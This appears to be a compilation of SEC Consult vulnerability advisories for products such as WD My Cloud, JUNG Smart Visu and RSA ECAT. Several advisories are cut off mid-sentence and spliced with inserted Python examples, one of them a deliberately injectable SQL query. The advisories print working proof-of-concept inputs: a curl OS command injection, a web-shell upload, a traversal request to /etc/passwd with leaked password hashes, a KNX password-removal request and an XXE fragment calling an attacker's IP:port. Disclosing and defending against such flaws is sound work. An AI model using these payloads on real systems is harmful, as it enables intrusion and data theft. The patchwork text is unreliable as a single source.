Ubiquiti Networks LBE-M5-23 (Version: XW v5.6.9/v6.0)
Ubiquiti Networks NBE-5AC-16 (Version: WA v7.2.4)
Ubiquiti Networks NBE-5AC-19 (Version: XC v7.2.4)
Ubiquiti Networks NBE-M2-13 (Version: XW v5.6
SEC Consult SA-20170308-0 :: Multiple vulnerabilities in Navetti PricePoint
SEC Consult Vulnerability Lab Security Advisory < 20170308-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Navetti PricePoint
 vulnerable version: 4.6.0.0
      fixed version: 4.7.0.0 or higher
         CVE number: -
             impact: high/critical
           homepage: http://www.navetti.com/
              found: 2016-07-18
                 by: W. Schober (Office Vienna)
                     SEC Consult Vulnerability Lab
                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"Navetti PricePoint is the ultimate business tool for controlling, managing
and measuring all aspects of your pricing. Our clients have been able to
increase their revenue and profitability substantially, implement market-
and value-based pricing, increase customer trust and implement a common
business language throughout their organization. In addition, with Navetti
PricePoint our clients are able to implement governance processes, manage
risk and ensure organization compliance, and attain business
sustainability."

Source: http://www.navetti.com/our-expertise/navetti-pricepoint/

Business recommendation:
------------------------
During a quick security check, SEC Consult identified four vulnerabilities,
some of them critical. As the time frame of the test was limited, it is
suspected that there are more vulnerabilities in the application. SEC Consult
highly recommends applying the patch that resolves the identified
vulnerabilities before using Navetti PricePoint in an environment with
potential attackers.

Vulnerability overview/description:
-----------------------------------
1) SQL Injection (Blind boolean based)
Navetti PricePoint is prone to SQL injection attacks. The attacks can be
executed from all privilege levels, from the lowest privileged users to the
highest. By exploiting this vulnerability, an attacker gains access to all
records stored in the database with the privileges of the database user.

2) Multiple persistent cross site scripting vulnerabilities
The web application suffers from multiple persistent cross site scripting
issues. Low privileged users as well as high privileged users are able to
inject malicious JavaScript payloads persistently into the application. This
vulnerability is even more critical because it can be used by a low
privileged user to elevate his privileges: the attacker can place a payload
which creates a new superuser or adds his own account to the superuser
group. When a superuser logs in to the application, the JavaScript payload
is executed with the rights of the superuser and the new user is created or
added to the superuser group.

3) Multiple reflected cross site scripting vulnerabilities
Navetti PricePoint suffers from multiple reflected cross site scripting
issues. The code used to generate error messages inside the application does
not correctly escape/sanitize user input; as a result, all error messages
containing user input are prone to reflected cross site scripting attacks.
Furthermore, the file upload dialog does not correctly sanitize the file
name of uploaded files. If a file name contains a JavaScript payload, it is
executed in the file upload dialog.

4) Cross Site Request Forgery
Navetti PricePoint does not implement any kind of cross site request forgery
protection. Attackers are able to execute arbitrary requests with the
privileges of any user; the only requirement is that the victim clicks on a
malicious link. For example, an administrator can be forced to execute
unwanted actions. Some of these actions are:
-) Add users
-) Delete users
-) Add users to an arbitrary role
-) Change internal settings of the application

Proof of concept:
-----------------
1) SQL Injection (Blind boolean based)
The search function in the tree structure, which displays various groups,
does not properly validate user input, allowing an attacker with any
privilege level to inject arbitrary SQL commands and read the contents of
the whole database.
The following URL could be used to perform blind SQL injection attacks:
-) URL: /NBN.Host/PMWorkspace/PMWorkspace/FamilieTreeSearch
   (Parameter: searchString, Type: GET)

2) Multiple persistent cross site scripting vulnerabilities
The following URL parameters have been identified to be vulnerable to
persistent cross site scripting:
-) URL: /NBN.Host/Component/Competitors/AddEdit (Parameter: name, POST)
-) URL: /NBN.Host/Component/ItemSearchGrid/EditData (Parameter: Quality105, POST)
-) URL: /NBN.Host/component/GroupInfo/SaveGroup (Para
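The Navetti tree search above is a textbook case of a search string being concatenated into SQL text. The added example below is not Navetti code; family_search_vulnerable and family_search_safe are hypothetical stand-ins for the FamilieTreeSearch handler, run against a constructed in-memory SQLite table so the difference is observable: the concatenated form lets a search string rewrite the WHERE clause (here, bypassing a visibility filter), while the parameterised form binds the value and can only ever match it as a pattern.

```python
import sqlite3

# Constructed sample data: (name, visible). The third row is meant to stay hidden.
SAMPLE_FAMILIES = [("Pumps", 1), ("Valves", 1), ("Internal pricing", 0)]


def open_demo_db() -> sqlite3.Connection:
    """In-memory table standing in for the group tree; constructed for the example."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE family (name TEXT, visible INTEGER)")
    con.executemany("INSERT INTO family VALUES (?, ?)", SAMPLE_FAMILIES)
    return con


def family_search_vulnerable(con: sqlite3.Connection, search_string: str) -> list:
    """The pattern behind a boolean-based blind injection: the user string is
    spliced into the SQL text, so quotes and comment markers change the query."""
    sql = ("SELECT name FROM family WHERE visible = 1 AND name LIKE '%"
           + search_string + "%'")
    return [row[0] for row in con.execute(sql)]


def family_search_safe(con: sqlite3.Connection, search_string: str) -> list:
    """Parameterised form: the driver binds the value after the statement is
    parsed, so the string is data and the visibility filter cannot be bypassed."""
    sql = "SELECT name FROM family WHERE visible = 1 AND name LIKE ?"
    return [row[0] for row in con.execute(sql, ("%" + search_string + "%",))]
```

One detail the safe version still leaves open: `%` and `_` inside the bound value remain LIKE wildcards. That is not injection, but if the search must be literal, escape them and add an `ESCAPE` clause.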
SEC Consult SA-20170307-0 :: Unauthenticated OS command injection & arbitrary file upload in Western Digital WD My Cloud
SEC Consult Vulnerability Lab Security Advisory < 20170307-0 > === title: Unauthenticated OS command injection & arbitrary file upload product: Western Digital My Cloud vulnerable version: at least: 2.21.126 (My Cloud), 2.11.157(My Cloud EX2), 2.21.126 (My Cloud EX2 Ultra), 2.11.157 (My Cloud EX4), 2.21.126 (My Cloud EX2100), 2.21.126 (My Cloud EX4100), 2.11.157 (My Cloud Mirror), 2.21.126 (My Cloud Mirror Gen2), 2.21.126 (My Cloud PR2100), 2.21.126 (My Cloud PR4100), 2.21.126 (My Cloud DL2100), 2.21.126 (My Cloud DL4100) fixed version: - CVE number: - impact: Critical homepage: https://www.wdc.com/en-um/ found: 2017-01-17 by: Wan Ikram (Office Kuala Lumpur) Fikri Fadzil (Office Kuala Lumpur) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com === Vendor description: --- "Reliable, centralized personal storage with automatic backup that plugs into your own home network. Share whatever you want, anywhere you have an Internet connection." Source: https://www.wdc.com/products/personal-cloud-storage/my-cloud.html Business recommendation: By combining the vulnerabilities documented in this advisory an attacker can fully compromise a WD My Cloud device. In the worst case one could steal sensitive data stored on the device or use it as a jump host for further internal attacks. SEC Consult recommends not to attach WD My Cloud to the network until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: --- The firmware doesn't apply proper validation on many user inputs. As a result, below vulnerabilities could be exploited by unauthenticated attackers to fully compromise the device. 1. Unauthenticated OS Command Injection Any OS commands can be injected by unauthenticated attackers. 
This is a serious vulnerability as the chances for the device to be fully compromised are very high.

2. Unauthenticated Arbitrary File Upload
A malicious file can be uploaded to the webserver with no authentication required. It is possible for an attacker to upload a script to issue operating system commands.

3. Cross Site Request Forgery (CSRF)
There is no anti-CSRF mechanism implemented in the firmware. Due to this, an attacker can force a user to execute any action through any script. As the vulnerabilities described in 1) and 2) do not need authentication, those can be exploited via CSRF over the Internet as well!

Proof of concept:
-
1. Unauthenticated OS Command Injection
Below is a sample cURL request to execute an arbitrary OS command via one of the vulnerable scripts.

$ curl http://$IP/web/addons/jqueryFileTree.php?host=x=x=x=x=x\"\; \; echo \"x

2. Unauthenticated Arbitrary File Upload
Below is the cURL request to upload arbitrary files to the webserver.

$ curl -F "file=@shell.php" http://$IP/web/addons/upload.php?name=x==

3. Cross Site Request Forgery (CSRF)
There is no anti-CSRF mechanism implemented for any of the accessible scripts in the firmware.

Vulnerable / tested versions:
-
The following device & firmware has been tested and found to be vulnerable:
2.11.157 (My Cloud EX2)

As the firmware used by all My Cloud devices is more or less similar, we believe the other versions are also prone to the same vulnerabilities. This could be verified by using the IoT Inspector software for automated firmware analysis.

Vendor contact timeline:
2017-01-18: Contacting vendor through "WD Support - Create a Support Case" page (https://support.wdc.com/support/case.aspx?lang=en). Assigned ticket number - 011817-11728265.
2017-01-19: Vendor: replies to the ticket asking for more clarification.
2017-01-20: Replied to the vendor, requesting security contact and encryption keys
2017-01-23: Vendor: "we don't have a security department that we could forward this concern"
2017-01-23: Telling support that there seems to be a security contact by referencing other WD advisories, requesting security contact again
2017-01-24: Vendor: asking for affected product name and firmware version.
2017-01-24: Providing list of affected product name and firmware versions,
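The two endpoints named in the proof of concept above are easy to watch for in web-server logs. The following detector is an added example and not part of the SEC Consult advisory or of the WD firmware: it runs over constructed Common Log Format lines (addresses and timestamps are made up), flags query strings to jqueryFileTree.php that carry shell metacharacters after percent-decoding, and flags any POST to upload.php, which the advisory states requires no authentication. The list of watched scripts and the metacharacter set are assumptions of this example.

```python
# Added example, not part of the SEC Consult advisory: detection logic for the
# two WD My Cloud scripts named in the proof of concept, run over constructed
# access-log lines.
import re
from urllib.parse import unquote, urlsplit

# Endpoints taken from the advisory; watching exactly these two is an
# assumption of this example.
WATCHED_SCRIPTS = {
    "/web/addons/jqueryFileTree.php": "command injection sink (query parameters)",
    "/web/addons/upload.php": "unauthenticated upload endpoint",
}

# Characters that terminate, chain or expand a shell command. A hostname or
# file name argument never legitimately contains them.
SHELL_META = re.compile(r'[;|&`$<>"\n]')

# Common Log Format. Addresses and timestamps in SAMPLE_LOG are constructed.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

SAMPLE_LOG = [
    '203.0.113.5 - - [18/Jan/2017:10:00:01 +0000] "GET /web/addons/jqueryFileTree.php?host=x%22%3B%20echo%20%22x HTTP/1.1" 200 512',
    '198.51.100.7 - - [18/Jan/2017:10:00:02 +0000] "GET /web/addons/jqueryFileTree.php?host=192.0.2.10 HTTP/1.1" 200 512',
    '198.51.100.9 - - [18/Jan/2017:10:00:03 +0000] "POST /web/addons/upload.php?name=x HTTP/1.1" 200 12',
    '198.51.100.7 - - [18/Jan/2017:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 1024',
]


def analyse(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path not in WATCHED_SCRIPTS:
        return None
    # Decode once so %22 and %3B are inspected as the characters the shell sees.
    query = unquote(parts.query)
    finding = {"ip": m.group("ip"), "ts": m.group("ts"), "path": parts.path}
    if parts.path.endswith("/upload.php") and m.group("method") == "POST":
        finding["reason"] = WATCHED_SCRIPTS[parts.path]
        return finding
    if SHELL_META.search(query):
        finding["reason"] = "shell metacharacters in query: %r" % query
        return finding
    return None


def scan(lines):
    """Run analyse() over an iterable of log lines and keep the findings."""
    return [f for f in map(analyse, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Decoding exactly once matters: the proof of concept escapes the quote and semicolon for the shell, but a browser or cURL sends them percent-encoded, so a detector that matches on the raw query string misses `%22%3B`.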
SEC Consult SA-20170207 :: Path Traversal, Backdoor accounts & KNX group address password bypass in JUNG Smart Visu server
SEC Consult Vulnerability Lab Security Advisory < 20170207-0 >
===
title: Path Traversal, Backdoor accounts & KNX group address password bypass
product: JUNG Smart Visu Server
vulnerable version: Firmware v1.0.804/1.0.830/1.0.832
fixed version: Firmware v1.0.900
CVE number: -
impact: Critical
homepage: http://www.jung.de/
found: 2016-11-10
by: T. Weber (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
    Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
    https://www.sec-consult.com
===

Vendor description:
---
"JUNG provides equipment and systems that win over by advanced technology, sophisticated design, and a large variety of features. On the one hand, our portfolio includes switches, socket outlets, dimmer, and observers. On the other, it includes innovative systems for controlling features in your home. From lighting, blind, or temperature control to wireless and KNX technologies, door communication, and multimedia control, a large range of applications is covered. In addition to comfort and security, also the requirements regarding cost-effectiveness and energy efficiency are met."

Source: http://www.jung.de/en/1828/company/company-portrait/

Business recommendation:
Attackers are able to gain root access through SSH with the credentials of the backdoor user account. An attacker can also unlock the group address protection for the KNX device mapping.

JUNG has provided updated firmware which should be installed immediately.

SEC Consult recommends not to use this product in a production environment until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
---
1) Path Traversal Vulnerability
The Smart Visu Server runs with root privileges and is vulnerable to path traversal. This leads to full information disclosure of all files on the system.
2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance. They can be used to gain access to the Smart Visu Server via SSH.

3) Group Address (GA) unlock without Password
As protection functionality, the KNX group address can be locked with a user-defined password. This password can be removed by using a single PUT request. An attacker can completely change the configuration of the connected devices (e.g. a light switch in the kitchen can be swapped with the air conditioner).

Proof of concept:
-
1) Path Traversal Vulnerability
The Smart Visu Server is vulnerable to path traversal by sending the following GET-Request:

Request
GET /SV-Home//..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd HTTP/1.1
Host: [...]
---
Response
HTTP/1.1 200 OK
Content-Disposition: inline;filename="passwd"
[...]
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
[...]
-
2) Backdoor Accounts
Two undocumented operating system user accounts are present on the appliance. They can be used to gain access to Smart Visu Server over SSH on Port 5.

Excerpt of the shadow file:
root:$6$Zcv.yVRg$0OfnoSEEWdP4K/2z5Mm/56nfGbdAPl4ZSm3oDWqn3fMD9cXfZCov7O/siheuYggHxuqHvZQ7nPSBM5BcbrH9n.:16840:0:9:7:::
daemon:*:15914:0:9:7:::
[...]
avahi:*:16541:0:9:7:::
jung:$6$1SblJl3F$q6h6vfSC.IataQSqDNGw0wGvV8m/x8uLozBIj4Yj.ZzMoHbaMvzb2tR.B45I/ajsWpwkTcCNGjSZsLdC9IuzD.:16714:0:9:7:::

3) Group Address (GA) unlock without Password
The following PUT request sends a JSON object to the server, which removes the password:

Request
PUT /rest/items/knxcom_datastore HTTP/1.1
Host: [...]

{"groupNames":[],"name":"knxcom_datastore","label":"knxcom_datastore","type":"GroupItem","tags":["{\"lock_ga\":false}"]}
-
Vulnerable / tested versions:
-
Firmware version 1.0.804, 1.0.830 and 1.0.832 have been tested and found to be vulnerable.

Vendor contact timeline:
2016-11-21: Contacting vendor through kundencen...@jung.de, ma
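The traversal request above is double-encoded (`%252f` decodes to `%2f`, which decodes to `/`), so a server that checks for `..` before its second decoding step, or that checks the URL rather than the resolved file, lets it through. The following path resolver is an added example, not code from the advisory or from the JUNG firmware: it peels percent-encoding until the string stops changing, joins the result under the web root, and decides on the final normalised filesystem path. The decode-round limit and the `/srv/www` root used in the usage are assumptions of this example.

```python
# Added example, not part of the SEC Consult advisory: server-side path
# resolution that rejects the double-encoded traversal shown in the PoC.
import posixpath
from urllib.parse import unquote

# Layers of percent-encoding to peel before refusing the request (assumption).
MAX_DECODE_ROUNDS = 3


class TraversalRejected(ValueError):
    pass


def fully_decode(raw):
    """Percent-decode until the string stops changing: '%252f' -> '%2f' -> '/'."""
    current = raw
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(current)
        if decoded == current:
            return decoded
        current = decoded
    raise TraversalRejected("too many encoding layers in %r" % raw)


def resolve_under_root(web_root, request_path):
    """Map a request path onto the filesystem, refusing anything outside web_root.

    The decision is taken on the normalised filesystem path *after* decoding, so
    '..' segments that only appear once the encoding is removed still count.
    web_root must be a real directory below '/', not '/' itself.
    """
    root = posixpath.normpath(web_root)
    decoded = fully_decode(request_path)
    if "\x00" in decoded:
        raise TraversalRejected("NUL byte in path")
    # lstrip('/') keeps join() from discarding the root for absolute paths.
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalRejected("%r resolves to %r, outside %r" % (request_path, candidate, root))
    return candidate


def is_rejected(web_root, request_path):
    """Convenience wrapper returning True when the request would be refused."""
    try:
        resolve_under_root(web_root, request_path)
        return False
    except TraversalRejected:
        return True


# The request path from the advisory's proof of concept.
ADVISORY_PATH = "/SV-Home//..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd"

if __name__ == "__main__":
    print(resolve_under_root("/srv/www", "/SV-Home/index.html"))
    print(is_rejected("/srv/www", ADVISORY_PATH))
```

The path check is only one layer: the advisory also notes the server runs as root, and a file handler that runs as an unprivileged user with no read access outside the web root limits what any traversal bug can disclose.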
SEC Consult SA-20161128-0 :: DoS & heap-based buffer overflow in Guidance Software EnCase Forensic
SEC Consult Vulnerability Lab Security Advisory < 20161128-0 >
===
title: Denial of service & heap-based buffer overflow
product: Guidance Software EnCase Forensic Imager & EnCase Forensic
vulnerable version: EnCase Forensic Imager <= 7.10
                    EnCase Forensic (tested with version 7.08.00.137)
fixed version: -
CVE number: -
impact: high
homepage: https://www.guidancesoftware.com/encase-forensic-imager
found: 2016-09-30
by: Wolfgang Ettlinger (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
    Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
    https://www.sec-consult.com
===

Vendor description:
---
"When time is short and you need to acquire entire volumes or selected individual folders, EnCase Forensic Imager is your tool of choice. Based on trusted, industry-standard EnCase Forensic technology, EnCase Forensic Imager:
* Is free to download and use
* Requires no installation
* Is a standalone product that does not require an EnCase Forensic license
* Enables acquisition of local drives (network drives are not able to be acquired with Imager)
* Provides easy viewing and browsing of potential evidence files, including folder structures and file metadata
* Can be deployed via USB stick and used to perform acquisition of a live device"

URL: https://www.guidancesoftware.com/encase-forensic-imager

Business recommendation:
SEC Consult recommends not to use Encase Forensic Imager or the Encase Forensic Suite until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
---
1) Denial of Service
Several manipulated hard disk images cause Encase Forensic Imager to crash. A suspect manipulating the hard drive could potentially hinder an investigator from using Encase Forensic Imager for creating hard disk images. Encase Forensic (v7) has been tested and found to be affected as well.
2) Heap-based buffer overflow
Using a manipulated ReiserFS image an attacker can overwrite heap memory on the investigator's machine. Because of several restrictions SEC Consult was unable to create an exploit that works reliably within a reasonable timeframe. However, as with most heap-based buffer overflow vulnerabilities it is possible that an attacker could gain arbitrary code execution nevertheless.

Proof of concept:
-
SEC Consult has created proof of concept disk images that will crash Encase. Those PoC images will not be released.

1) Denial of Service
The following list demonstrates cases that cause Encase to crash. The investigators would be unable to analyze the hard disk/partition/image using the affected products:

* Ext3:
  - Several conditions cause Encase Forensic Imager to encounter a div/0 exception. Disk images that were manipulated in the following way demonstrate this issue. Those crashes have not been further investigated as to whether code execution is possible.
    + number of blocks per group: 0x
    + total number of blocks: 0x
    + last mount path: 'A'*10
    + volume name: 'A'*10
    + block number of the superblock: 0
    + FS-Id: 'A'*10
  - Manipulating the size of the inode structure value (e.g. 0x) causes Encase Forensic Imager to write beyond the limits of a previously allocated (VirtualAlloc) segment.
* Iso9660:
  - If the length of a file name is specified in a way that it would exceed the end of the last block, Encase Forensic Imager crashes while trying to read beyond an allocated segment.
* ReiserFs:
  - When setting a block size of below 0x200 the application overwrites heap memory with attacker-supplied data.
* GPT:
  - When specifying an overly long name (in our setup longer than 0x3fc6) for a partition, Encase Forensic crashes failing to read memory when trying to determine the length of the string. The partition table can be constructed in a way that it can also be used for storing data. However, an investigator using Encase will not be able to analyze it.
2) Heap-based buffer overflow
The manipulated ReiserFs image that causes the application to overwrite heap memory can be tuned to overwrite heap-data with attacker-controlled data. The application calculates a value (here called "dev_block_count") as:

dev_block_count = blocksize from image (e.g. 0x200) / blocksize of reading device (typically 0x200) * number of blocks

.text:0
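Every crash in the Ext3 list above comes from trusting a superblock field before checking it: a zero blocks-per-group value reaches a division, an oversized inode-size value drives an allocation, and fixed-width name fields are read as if they were NUL-terminated. The following superblock parser is an added example, not code from the advisory or from EnCase: it reads the handful of ext2/ext3 superblock fields involved (offsets follow the ext2 on-disk layout), validates each one before it is used as a divisor, size or string length, and is exercised on constructed 2 KiB images rather than real evidence. The plausibility bounds it applies are assumptions of this example.

```python
# Added example, not part of the SEC Consult advisory: validate ext2/3
# superblock fields before using them, against constructed images.
import math
import struct

EXT_SUPER_MAGIC = 0xEF53
SUPERBLOCK_OFFSET = 1024  # the superblock always starts 1 KiB into the volume

# (offset, struct format) within the superblock, ext2 on-disk layout, little-endian.
_FIELDS = {
    "blocks_count":     (4,   "<I"),
    "first_data_block": (20,  "<I"),
    "log_block_size":   (24,  "<I"),   # block size = 1024 << log_block_size
    "blocks_per_group": (32,  "<I"),
    "inodes_per_group": (40,  "<I"),
    "magic":            (56,  "<H"),
    "rev_level":        (76,  "<I"),
    "inode_size":       (88,  "<H"),   # only meaningful for rev_level >= 1
    "volume_name":      (120, "16s"),  # fixed width, not necessarily NUL-terminated
    "last_mounted":     (136, "64s"),  # fixed width, not necessarily NUL-terminated
}


class SuperblockError(ValueError):
    pass


def parse_superblock(image):
    """Return derived geometry, or raise SuperblockError before any bad value is used."""
    sb = image[SUPERBLOCK_OFFSET:SUPERBLOCK_OFFSET + 1024]
    if len(sb) < 1024:
        raise SuperblockError("image too short to hold a superblock")
    f = {k: struct.unpack_from(fmt, sb, off)[0] for k, (off, fmt) in _FIELDS.items()}
    if f["magic"] != EXT_SUPER_MAGIC:
        raise SuperblockError("bad magic 0x%04x" % f["magic"])
    if f["log_block_size"] > 6:  # 64 KiB upper bound (assumption)
        raise SuperblockError("implausible log_block_size %d" % f["log_block_size"])
    block_size = 1024 << f["log_block_size"]
    # Divisors are checked before any division happens.
    if f["blocks_per_group"] == 0 or f["inodes_per_group"] == 0:
        raise SuperblockError("zero blocks/inodes per group would divide by zero")
    if f["blocks_count"] <= f["first_data_block"]:
        raise SuperblockError("blocks_count %d not beyond first data block" % f["blocks_count"])
    if f["blocks_per_group"] > 8 * block_size:  # block bitmap must fit in one block
        raise SuperblockError("blocks_per_group %d exceeds bitmap capacity" % f["blocks_per_group"])
    inode_size = 128 if f["rev_level"] == 0 else f["inode_size"]
    if inode_size < 128 or inode_size > block_size or inode_size & (inode_size - 1):
        raise SuperblockError("implausible inode size %d" % inode_size)
    group_count = math.ceil((f["blocks_count"] - f["first_data_block"]) / f["blocks_per_group"])
    # Strings are sliced to their declared width; no strlen, no terminator assumed.
    return {
        "block_size": block_size,
        "group_count": group_count,
        "inode_size": inode_size,
        "volume_name": f["volume_name"].split(b"\0", 1)[0].decode("ascii", "replace"),
        "last_mounted": f["last_mounted"].split(b"\0", 1)[0].decode("ascii", "replace"),
    }


def make_superblock(**overrides):
    """Build a constructed 2 KiB image with a sane superblock; overrides inject bad values."""
    values = dict(blocks_count=8192, first_data_block=1, log_block_size=0,
                  blocks_per_group=8192, inodes_per_group=2048, magic=EXT_SUPER_MAGIC,
                  rev_level=1, inode_size=256, volume_name=b"sample", last_mounted=b"/mnt/sample")
    values.update(overrides)
    sb = bytearray(1024)
    for name, value in values.items():
        off, fmt = _FIELDS[name]
        struct.pack_into(fmt, sb, off, value)
    return bytes(SUPERBLOCK_OFFSET) + bytes(sb)


def is_rejected(image):
    try:
        parse_superblock(image)
        return False
    except SuperblockError:
        return True


if __name__ == "__main__":
    print(parse_superblock(make_superblock()))
    print(is_rejected(make_superblock(blocks_per_group=0)))
```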
SEC Consult SA-20161114-0 :: Multiple vulnerabilities in I-Panda SolarEagle - Solar Controller Administration Software / MPPT Solar Controller SMART2
SEC Consult Vulnerability Lab Security Advisory < 20161114-0 >
===
title: Multiple vulnerabilities
product: I-Panda SolarEagle - Solar Controller Administration Software / MPPT Solar Controller SMART2
vulnerable version: SolarEagle V2.00 / MPPT Solar Controller SMART2
fixed version: -
CVE number: -
impact: Medium
homepage: http://www.solarcontroller-inverter.com/
found: 2016-09-03
by: T. Weber (Office Vienna)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
    Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
    https://www.sec-consult.com
===

Vendor description:
---
"ShenZhen I-Panda Electronics Co. Ltd. is developing power supply devices such as UPS, power adapter and power inverter and also equipment for solar systems. This equipment produced by I-Panda comprises solar panels/ controllers/inverters and also solar generator systems."

Source: http://www.solarcontroller-inverter.com/about-us.html

Business recommendation:
SEC Consult recommends not to use this product until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
---
1) Broken Local Admin Authentication in SolarEagle V2.00
Attackers who have access to the locally installed software are able to bypass the administrative login and can control the MPPT Solar Controller.

2) Missing Server Side Authentication in MPPT Solar Controller SMART2
Attackers who have access to the local network can send their own commands to the MPPT Solar Controller and are able to control the device this way.

3) Unencrypted Communication in MPPT Solar Controller SMART2
Eavesdropping on the communication is possible since unencrypted TCP is used for all packets which are transferred between the controller and SolarEagle.

4) Denial of Service in MPPT Solar Controller SMART2
Attackers are able to disrupt an active connection for as long as they want.
Proof of concept:
-
The vendor was not responsive, hence there is no fix available. The proof of concept has been removed from this advisory.

Vulnerable / tested versions:
-
SolarEagle V2.00 / MPPT Solar Controller SMART2

Vendor contact timeline:
2016-09-12: Contacting vendor through email, sending responsible disclosure policy, defining release deadline (10th November), asking for encryption keys
2016-09-13: Contacting vendor through email, sending responsible disclosure policy, defining release deadline (10th November), asking for encryption keys
2016-09-13: Vendor: (Instant-Messenger) No encryption available. Offer to send the advisory unencrypted; No Answer
2016-10-29: Offer to send the advisory unencrypted; No Answer
2016-11-03: Offer to send the advisory unencrypted; No Answer
2016-11-14: SEC Consult releases security advisory

Solution:
-
There is no fix available from the vendor as they did not respond.

Workaround:
---
No workaround

Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF
SEC Consult SA-20161011-0 :: XXE vulnerability in RSA Enterprise Compromise Assessment Tool (ECAT)
SEC Consult Vulnerability Lab Security Advisory < 20161011-0 >
===
title: XML External Entity Injection (XXE)
product: RSA Enterprise Compromise Assessment Tool (ECAT)
vulnerable version: 4.1.0.1
fixed version: 4.1.2.0
CVE Number: -
impact: Medium
homepage: https://www.rsa.com
found: 2016-04-27
by: Samandeep Singh (Office Singapore)
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult
    Bangkok - Berlin - Linz - Montreal - Moscow
    Singapore - Vienna (HQ) - Vilnius - Zurich
    https://www.sec-consult.com
===

Vendor description:
---
"RSA provides more than 30,000 customers around the world with the essential security capabilities to protect their most valuable assets from cyber threats. With RSA's award-winning products, organizations effectively detect, investigate, and respond to advanced attacks; confirm and manage identities; and ultimately, reduce IP theft, fraud, and cybercrime."

Source: https://www.rsa.com/en-us/company/about

Business recommendation:
By exploiting the XXE vulnerability, an attacker can get read access to the filesystem of the user's system using the RSA ECAT client and thus obtain sensitive information from the system. It is also possible to scan ports of the internal hosts and cause DoS on the affected host.

SEC Consult recommends not to use the product until a thorough security review has been performed by security professionals and all identified issues have been resolved.

Vulnerability overview/description:
---
1) XML External Entity Injection
The used XML parser is resolving external XML entities which allows attackers to read files and send requests to systems on the internal network (e.g. port scanning). The vulnerability can be exploited by tricking the user of the application to import a whitelisting file with malicious XML code.

Proof of concept:
-
1) XML External Entity Injection (XXE)
The RSA ECAT client allows users to import whitelisting files in XML format.
By tricking the user to import an XML file with malicious XML code into the application, it's possible to exploit an XXE vulnerability within the application. For example, by importing the following XML code, arbitrary files can be read from the client's system. The following code generates the connection request from the client system to the attacker's system.

===
http://[IP:port]/; >]>
===

IP:port = IP address and port where the attacker is listening for connections

Furthermore some files can be exfiltrated to remote servers via the techniques described in:
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf

Vulnerable / tested versions:
-
The XXE vulnerability has been verified to exist in the RSA ECAT software version 4.1.0.1 which was the latest version available at the time of discovery.

Vendor contact timeline:
2016-04-28: Vulnerabilities reported to the vendor by 3rd party
2016-06-23: Fixed by vendor in version 4.1.2 (ECAT-5972)
2016-10-11: SEC Consult releases security advisory

Solution:
-
Update to version 4.1.2.0

Workaround:
---
None

Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
